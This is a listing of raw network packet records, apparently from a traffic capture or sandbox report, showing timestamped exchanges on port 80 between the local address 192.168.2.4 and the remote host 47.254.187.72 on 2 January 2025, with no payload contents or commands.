                                                                            Jan 2, 2025 20:34:52.218909025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.218919039 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.218930006 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.218940973 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.218949080 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.218951941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.218976974 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.218985081 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.218995094 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.218995094 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.219006062 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219024897 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.219049931 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.219099045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219110012 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219121933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219131947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219134092 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.219150066 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219155073 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.219161034 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219172955 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219178915 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.219213009 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.219276905 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219294071 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219305992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219331980 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.219332933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219345093 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219356060 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219357967 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.219367981 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219377995 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219388962 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219393015 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.219399929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219412088 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219410896 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.219430923 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.219450951 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.219482899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219495058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219505072 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219516993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219537020 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.219559908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219563961 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.219598055 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.219691992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219703913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219713926 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219724894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219736099 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219739914 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.219747066 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219749928 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.219758034 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219770908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219774961 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.219786882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219799042 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219800949 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.219809055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219824076 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.219852924 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.219856024 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219871998 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219883919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219892979 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.219893932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219907045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219917059 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.219919920 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.219949961 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.222707033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.222764969 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.222798109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.222810030 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.222820997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.222831964 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.222843885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.222855091 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.222860098 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.222893000 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.225331068 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.225352049 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.225363970 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.225375891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.225388050 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.225390911 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.225399017 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.225410938 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.225418091 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.225438118 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.225462914 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.227757931 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.227781057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.227792978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.227804899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.227809906 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.227819920 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.227823973 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.227835894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.227842093 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.227849960 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.227875948 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.227895021 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.232822895 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.232835054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.232862949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.232873917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.232886076 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.232892036 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.232917070 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.232923985 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.232934952 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.232948065 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.232949972 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.232958078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.232994080 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.233025074 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.233036041 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.233046055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.233063936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.233074903 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.233076096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.233088017 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.233098030 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.233098984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.233125925 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.234999895 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.235018015 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.235030890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.235042095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.235054016 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.235064030 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.235075951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.235203981 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.236000061 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.236021996 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.236035109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.236052036 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.236063957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.236068010 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.236074924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.236085892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.236098051 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.236102104 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.236139059 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.305110931 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305160046 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305170059 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305186987 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305197001 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305207968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305217981 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305228949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305247068 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.305303097 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.305382967 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305399895 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305413008 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305444956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305450916 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.305454969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305465937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305480003 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.305507898 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.305521965 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305531979 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305542946 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305552959 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305556059 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.305565119 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305586100 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.305612087 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.305627108 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305644035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305655003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305665016 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305680990 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.305707932 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.305735111 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305746078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305757999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305768013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305768967 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.305778027 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305788994 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.305803061 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.305826902 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.305830956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305866957 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.305949926 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305960894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305970907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305982113 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305991888 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.305994034 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.306001902 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.306011915 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.306020975 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.306022882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.306041002 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.306063890 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.306085110 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.306094885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.306106091 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.306116104 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.306126118 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.306132078 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.306188107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.306199074 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.306209087 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.306212902 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.306217909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.306220055 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.306252956 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.306276083 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.306277990 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.306298971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.306308985 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.306319952 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.306330919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.306338072 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.306365013 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.306375980 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.306377888 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.306386948 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.306405067 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.306416988 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.306416988 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.306421995 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.306433916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.306444883 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.306452036 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.306454897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.306471109 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.306495905 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.306628942 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.306641102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.306652069 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.306665897 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.306687117 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.306693077 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.306698084 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.306704044 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.306714058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.306730986 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.306759119 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.309601068 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.309612036 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.309628963 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.309638977 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.309649944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.309659958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.309669971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.309673071 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.309720039 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.311883926 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.311894894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.311929941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.311947107 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.311980009 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.312001944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.312012911 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.312024117 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.312033892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.312040091 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.312046051 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.312056065 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.312088966 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.314757109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.314769030 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.314779997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.314793110 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.314802885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.314812899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.314819098 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.314825058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.314836025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.314867020 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.314891100 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.319766045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.319794893 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.319804907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.319816113 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.319820881 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.319837093 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.319845915 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.319849014 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.319854975 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.319864988 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.319865942 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.319875956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.319890022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.319892883 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.319901943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.319916964 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.319938898 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.319982052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.319992065 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.320003033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.320012093 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.320033073 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.320049047 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.321667910 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.321763992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.321774006 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.321784019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.321794987 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.321805954 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.321810007 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.321820021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.321825027 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.321847916 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.321861029 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.322834969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.322851896 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.322861910 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.322871923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.322874069 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.322882891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.322891951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.322906971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.322913885 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.322916031 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.322940111 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.322953939 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.392007113 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392049074 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392061949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392071962 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392081976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392092943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392102003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392113924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.392127037 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.392210007 CET4973080192.168.2.447.254.187.72
